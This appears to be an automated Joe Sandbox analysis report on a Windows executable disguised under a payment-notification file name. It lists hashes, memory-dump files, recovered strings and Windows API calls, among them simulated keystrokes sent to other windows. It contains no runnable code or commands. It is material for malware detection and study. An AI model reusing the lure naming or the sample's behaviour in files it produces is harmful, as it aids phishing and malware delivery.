                                                                                                                              • API String ID: 2156557900-0
                                                                                                                              • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                                              • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                                                                              • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                                              • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                              • API String ID: 0-1603158881
                                                                                                                              • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                                              • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                                                                              • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                                              • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                                                                              APIs
                                                                                                                              • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                                                                              • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LoadString
                                                                                                                              • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                              • API String ID: 2948472770-2354261254
                                                                                                                              • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                                              • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                                                                              • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                                              • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                                                                              APIs
                                                                                                                              • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                                                                              • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LoadString
                                                                                                                              • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                              • API String ID: 2948472770-8599901
                                                                                                                              • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                                              • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                                                                              • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                                              • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleLoadModuleString
                                                                                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                                                                              • API String ID: 3590730445-2561132961
                                                                                                                              • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                                              • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                                                                              • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                                              • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                                                                              APIs
                                                                                                                              • CreateMenu.USER32 ref: 00448603
                                                                                                                              • SetMenu.USER32(?,00000000), ref: 00448613
                                                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                                                                              • IsMenu.USER32(?), ref: 004486AB
                                                                                                                              • CreatePopupMenu.USER32 ref: 004486B5
                                                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                                                                              • DrawMenuBar.USER32 ref: 004486F5
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 161812096-4108050209
                                                                                                                              • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                                              • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                                                                              • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                                              • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                                                                              • LoadStringW.USER32(00000000), ref: 00454040
                                                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleLoadMessageModuleString
                                                                                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                              • API String ID: 2734547477-4153970271
                                                                                                                              • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                                              • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                                                                              • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                                              • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                                                                              APIs
                                                                                                                              • GetParent.USER32 ref: 00445BF8
                                                                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClassMessageNameParentSend
                                                                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                              • API String ID: 1290815626-3381328864
                                                                                                                              • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                                              • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                                                                              • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                                              • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                                              • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                                                                              • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                                              • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                                              • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                                                                              • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                                              • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitVariant
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1927566239-0
                                                                                                                              • Opcode ID: f5e40c8b900fee1b1836114e96baa7676a5d0ea0456728bbb6ba58b9775705ba
                                                                                                                              • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                                                                              • Opcode Fuzzy Hash: f5e40c8b900fee1b1836114e96baa7676a5d0ea0456728bbb6ba58b9775705ba
                                                                                                                              • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00445AA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00445AC7
                                                                                                                                • Part of subcall function 00445AA7: GetCurrentThreadId.KERNEL32 ref: 00445ACE
                                                                                                                                • Part of subcall function 00445AA7: AttachThreadInput.USER32(00000000), ref: 00445AD5
                                                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445E6F
                                                                                                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445E88
                                                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445E96
                                                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445E9C
                                                                                                                              • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445EBD
                                                                                                                              • Sleep.KERNEL32(00000000), ref: 00445ECB
                                                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445ED1
                                                                                                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445EE6
                                                                                                                              • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445EEE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2014098862-0
                                                                                                                              • Opcode ID: 5ca03ddf5c5627d7609a553b695717aade5f72ce3845e2189486292beca2fa90
                                                                                                                              • Instruction ID: 3cb45b36699f005c3339592b7719367c9fd6f04972b18b3a4454280c1561912d
                                                                                                                              • Opcode Fuzzy Hash: 5ca03ddf5c5627d7609a553b695717aade5f72ce3845e2189486292beca2fa90
                                                                                                                              • Instruction Fuzzy Hash: 44115671390300BBF6209B959D8AF5A775DEB98B11F20490DFB80AB1C1C5F5A4418B7C
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClearVariant
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1473721057-0
                                                                                                                              • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                                              • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                                                                              • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                                              • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                                                                              APIs
                                                                                                                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                                                                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                                                                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                                                                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                              • String ID: @COM_EVENTOBJ
                                                                                                                              • API String ID: 327565842-2228938565
                                                                                                                              • Opcode ID: 8d68769e25e8d01640c36805b8621208eaf5358c57efe8be0f1ba0a08893845a
                                                                                                                              • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                                                                              • Opcode Fuzzy Hash: 8d68769e25e8d01640c36805b8621208eaf5358c57efe8be0f1ba0a08893845a
                                                                                                                              • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                                                                              APIs
                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                                                                              • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00470516
                                                                                                                                • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                                                                                • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                                                                              • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
